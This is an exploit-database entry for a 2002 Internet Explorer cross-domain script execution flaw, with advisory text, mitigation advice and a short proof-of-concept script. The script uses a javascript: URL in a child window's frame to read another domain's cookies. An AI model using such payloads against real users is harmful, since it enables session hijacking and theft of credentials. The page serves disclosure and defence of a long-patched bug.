header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
SecurityFocus
7.5
CVSS
HIGH
Cross-Domain Script Execution
79
CWE
Product Name: Internet Explorer
Affected Version From: Microsoft Internet Explorer 5.0
Affected Version To: Microsoft Internet Explorer 6.0
Patch Exists: YES
Related CWE: CVE-2002-0649
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

MSIE Cross-Domain Script Execution Vulnerability

When a Microsoft Internet Explorer (MSIE) window opens another window, security checks should prevent the parent from accessing the child if the latter is of another domain or Security Zone. It has been reported that such checks fails to occur against attempts to access the frames of child window documents. It is possible for a parent window to set the URL of frames or iframes within a child window regardless of the domain or Security Zone. This has serious security implications as the parent can cause script code to be executed within the context of the child domain by setting the URL to the 'javascript' protocol, followed by the desired code. Attackers may also execute script code within the 'My Computer' Zone. This may have more severe consequences.

Mitigation:

Ensure that all web browsers are kept up-to-date with the latest security patches. It is also recommended that users restrict the privileges of their web browsers to the minimum required to perform their tasks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5672/info

When a Microsoft Internet Explorer (MSIE) window opens another window, security checks should prevent the parent from accessing the child if the latter is of another domain or Security Zone. It has been reported that such checks fails to occur against attempts to access the frames of child window documents. It is possible for a parent window to set the URL of frames or iframes within a child window regardless of the domain or Security Zone. This has serious security implications as the parent can cause script code to be executed within the context of the child domain by setting the URL to the "javascript" protocol, followed by the desired code. Attackers may also execute script code within the "My Computer" Zone. This may have more severe consequences. 

<script language="jscript">
onload=function () {
    var
oVictim=open("http://groups.google.com/groups?threadm=anews.Aunc.850","OurVi
ctim","width=100,height=100");
    setTimeout(
        function () {
            oVictim.frames[0].location.href="javascript:alert(document.cooki
e)";
        },
        7000
    );
}
</script>

Navigation

Suggest Exploit

Services By CQR